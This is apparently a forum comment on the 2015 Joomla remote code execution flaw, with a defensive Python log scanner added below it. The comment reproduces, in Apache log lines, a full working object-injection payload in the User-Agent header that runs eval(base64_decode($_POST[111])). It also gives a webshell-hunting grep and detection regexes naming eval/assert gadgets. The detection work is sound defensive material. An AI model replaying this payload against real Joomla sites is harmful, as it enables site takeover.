
Vulnerability Details: Joomla Remote Code Execution - ebarock
https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html
======
vlsoft
In case you haven't encountered this attack, basically anything from Joomla
1.5 to 3.4.5 is vulnerable.

The payload I have seen is FilesMan, and it has a recognizable
gzinflate(base64_decode( part encoded, so this should find them:

    # the hex escapes spell out eval(gzinflate(base64_decode( ; the doubled
    # backslashes make grep match the literal \x.. sequences in the PHP source
    grep -rl '\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28' --include=\*.php .

The exploit goes like this (snippet from Apache2 logs, enjoy):

      XXX.XXX.XXX.XXX - - [14/Dec/2015:21:17:53 +0100] "GET / HTTP/1.1" 200 6219 "http://google.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
      XXX.XXX.XXX.XXX - - [14/Dec/2015:21:17:55 +0100] "POST / HTTP/1.1" 200 10276 "http://google.com/" "Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36"

They send the User-Agent header with the exploit code, which allows them to do
a subsequent POST with a better payload, although I have observed simple
phpinfo() calls too. The recent IPs I have seen are Tor exit nodes, but ymmv.
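A small log scanner for the pattern described above, added here as an illustration and not part of the original post or of any Joomla or Sucuri code. It parses Apache combined-format lines, flags User-Agent values that carry the PHP-serialized object graph (the `}__` prefix, `O:<n>:"Class":` headers, the Joomla gadget names, and the eval/assert primitives from the captured request), and then lists the later requests from the same address within a short window, since the post notes the exploit is followed by a POST with the real payload. The log lines, IP addresses, the `PLACEHOLDER` feed_url value and the indicator names are constructed for the example.

```python
import re
from datetime import datetime

# Constructed sample Apache combined-format log lines (not real traffic).
# Line 1 mirrors the shape of the request from the post: a PHP-serialized
# object graph in the User-Agent field (Apache logs `"` as `\"` and the NUL
# bytes as `\\0`); the feed_url payload is replaced by a placeholder.
# Line 2 is the follow-up POST from the same address; line 3 is unrelated noise.
SAMPLE_LOG = r'''203.0.113.10 - - [14/Dec/2015:21:17:53 +0100] "GET / HTTP/1.1" 200 6219 "http://google.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"feed_url\";s:11:\"PLACEHOLDER\";s:19:\"cache_name_function\";s:6:\"assert\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}"
203.0.113.10 - - [14/Dec/2015:21:17:55 +0100] "POST / HTTP/1.1" 200 10276 "http://google.com/" "Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36"
198.51.100.7 - - [14/Dec/2015:21:18:01 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/7.45.0"
'''

# Apache "combined" format; the User-Agent is taken greedily up to the final
# quote because a hostile one may itself contain escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Indicator names are our own; each regex is derived from the captured request.
INDICATORS = {
    # PHP serialized object header O:<len>:"<class>":<n>:{ (quotes may be \"-escaped in the log)
    "serialized_object": re.compile(r'O:\d+:\\?"[A-Za-z_]\w*\\?":\d+:\{'),
    # the }__ prefix that terminates the session's own serialized string
    "session_terminator": re.compile(r'^\}__'),
    # gadget-chain class and property names from the capture
    "joomla_gadget": re.compile(r'JDatabaseDriverMysqli|disconnectHandlers|SimplePie'),
    # code-execution primitives carried inside the serialized data
    "code_eval": re.compile(r'\beval\(|\bbase64_decode\(|\bassert\b'),
}


def parse_line(line):
    """Split one combined-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def user_agent_indicators(ua):
    """Sorted names of the indicators that fire on a User-Agent string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(ua))


def parse_ts(ts):
    """Apache timestamp, e.g. 14/Dec/2015:21:17:53 +0100, to an aware datetime."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def scan_log(text, followup_window=120):
    """Flag requests whose User-Agent matches, with later requests from the same IP.

    The follow-up list is what makes a hit actionable: in the post the poisoned
    User-Agent was followed two seconds later by a POST carrying the payload.
    """
    records = [r for r in (parse_line(l) for l in text.splitlines()) if r]
    hits = []
    for i, rec in enumerate(records):
        found = user_agent_indicators(rec["ua"])
        if not found:
            continue
        t0 = parse_ts(rec["ts"])
        followups = [
            other["req"] for other in records[i + 1:]
            if other["ip"] == rec["ip"]
            and 0 <= (parse_ts(other["ts"]) - t0).total_seconds() <= followup_window
        ]
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "request": rec["req"],
                     "indicators": found, "followups": followups})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ip"]} {h["ts"]} {h["request"]!r} -> {", ".join(h["indicators"])}; '
              f'follow-ups: {h["followups"]}')
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the `serialized_object` and `session_terminator` indicators are the ones worth alerting on by themselves, since a legitimate browser never sends a serialized PHP object in its User-Agent, while `code_eval` on its own will also fire on harmless strings and is better used to rank hits.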

